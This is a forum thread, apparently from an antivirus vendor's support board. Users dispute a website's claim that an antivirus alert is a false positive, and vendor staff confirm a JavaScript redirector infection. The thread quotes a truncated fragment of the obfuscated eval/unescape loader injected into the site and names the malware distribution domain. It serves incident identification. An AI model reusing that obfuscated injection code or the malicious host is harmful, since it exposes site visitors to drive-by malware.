Sense.FM 'JS:Downloader-AC (Trj)' message - False Positive?

Hello,

The message I am receiving is as follows:

From hxxp://sense.fm

File name: hxxp://gumblar.cn/rss/?id=
Malware name: JS:Downloader-AC (Trj)

They are claiming this is a false positive:

Analysis of Malware Reports

Whether you are familiar with Virus Protection, you are an advanced computer user, or simply have no idea what we are talking about but getting weird messages on your Desktop then follow along. I will attempt to break this down to everyone as simple as possible to help you understand that there is no virus on the Sense FM Website but rather that your Virus Protection software is having a bad day.

Pending on what type of Virus Protection software you use on a PC, MAC, or Linux even the following analysis will vary slightly. The problem that is happening here is that when you visit hxxp://www.sense.fm suddenly you receive a notification stating that there is a JS Redirect Trojan Horse or something along these lines. If you follow closely the message that you receive you will notice that the file that your virus protection is stating has infection ends with .JS Hopefully so far you are following everything I’m saying as i’m merely outlining that you should pay close attention to the message you are receiving on your Desktop. You may also notice somewhere in your error message (pending on the message body itself) that there is an error with CSS on our website. Like I mentioned earlier your virus protection software is having a bad day and simply thinks that the Sense.FM website is attempting an injection via browser to your computer. THIS IS NOT TRUE!!! Our website uses various JavaScript codes including URL redirection and rewriting of actual URLs. Since a virus protection software generally can not determine a redirection (in this case) or url rewriting (also within the issue) as being bad code then it flags it as being malicious.
Limited Troubleshooting Suggestions

Since we do not offer any support for the virus protection software that you use on your computer I will only offer limited support for this. The best solution for this (pending your virus protection software options) is to modify or change a Web Shield or On-Access option within your virus protection software itself. This will simply eliminate bad false messages from appearing on your desktop which in fact are not any errors on our website but rather your virus protection software being too sensitive to some files and code within them. Comes to worse you will need to contact the company that supports your virus protection software and consult with them about such an error. They should be aware of this type of scenario and will have a resolution for you as well similar to the one I stated.

Now my line of reasoning, is if this is true, why would they obfuscate the javascript code as so:

(function(Kjh0c){var xu9=‘%’;eval(unescape(('var-20-61-3d-22ScriptEn-67i-6ee-22-2cb-3d-22Version-28)-2b-22-2cj-3d-22-22-2cu-3dnavigat-6fr-2e-75serAgent-3bif(-28u-2e-69nde-78O-66(-22Wi-6e-22)-3e0)-26-26(-75-2einde-78-4ff(-22NT-20-36-22)-3c0-29-26-26(document-2e-63ookie-2eindexOf truncated

But anyway, if someone would be willing to confirm that this is indeed a false positive, I would appreciate it. Claims of false positives coming from a site with obfuscated javascript leads to believe this is lies and they just don’t know WTF is going on.

Thanks,
Joe

Hello,

Webpage is infected with new mutation of trojan named JS:Redirector-H, Avast users are safe because we are blocking gumlar.cn as url and we are catching distribution scripts on that server too (JS:Downloader-AC).

Detection of this new mutation will be added very soon.

Regards

Thanks for the quick response. I’ve forwarded this information off and hopefully they can fix their infection.

  • J

Well, they were offline for a while, now showing up with Redirector-H8, -H2, and -H4 variants as well as the Downloader-AC, on all pages, including the comments and contact links.

Hopefully they’ll figure out something is up eventually :frowning:

Me I think like you about obfuscated javascript, considering it is a plain language scripting language, I can’t understand what they would have to hide by obfuscating it.

Given that this alert is directly after the closing Head tag and is distinctly different from all the other script tags on the page, the insertion point and a lack of formatting or the script, is typical of code injection.

See image, which I have edited to make it easier see the code as it is mostly on the same line.

The fact that % is being replaced by - to hide the escape codes even further tipped me off to it being A Very Bad Thing®. Seems that their heads are still in the sand on this. Do you have any other resources/information that I might be able to forward the webmaster so that they might be willing to give their site an honest evaluation? Some 3rd party scanner, explanation of SQL injection, something of that sort. I like the music on there and I’d hate to start telling my friends to avoid them like the plague because they have…well…a plague.

Why don’t they trust the nerds? :cry:

Well I don’t have an easy explanation of SQL Injection, but it takes advantage of vulnerabilities in the software to be able to exploit them and allow code to be inserted when a file is served up. I’m just an avast user like your self.

I visited the home page again and got the alert again, so nothing has changed on the that page that I can see.

Now this type of attack the hacking of sites and insertion of code isn’t even checked for by many scanners, but they are starting to get wise to it, so we should start to see more detections.

This is one of the only third party sites that I can think of, you enter the URL that you want to check and it checks out the page and will display its results, which are cached for two hours, http://www.UnmaskParasites.com/security-report/?page=sense.fm. Obviously you would have to run the test again if outside the two hour cache window, but it isn’t difficult or take long.